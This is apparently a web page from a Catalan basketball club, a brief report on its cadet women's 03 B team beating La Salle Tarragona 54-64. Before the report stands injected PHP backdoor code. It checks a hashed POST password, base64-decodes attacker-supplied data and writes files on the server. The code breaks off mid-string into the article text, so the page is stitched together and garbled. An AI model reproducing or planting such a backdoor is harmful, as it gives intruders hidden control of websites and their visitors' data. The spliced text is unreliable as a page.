function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La bona defensa i el tir exterior permeten el cadet femení 03 B imposar-se a la Salle Tarragona (54-64) - Tgn Bàsquet Club -

La bona defensa i el tir exterior permeten el cadet femení 03 B imposar-se a la Salle Tarragona (54-64)

Updated: març 12, 2019

L’equip cadet femení 03 B va guanyar a la pista de la Salle Tarragona en un partit on les noies que entrena José Córcoles van fonamentar el triomf en la bona defensa i l’encert exterior en la primera meitat. Al descans el resultat era de 20-36 i l’avantatge lila va arribar als 21 punts en els primers compassos del tercer quart. Només una certa relaxació visitant i la lluita local van provocar la retallada de diferències tot i que la victòria no va córrer perill.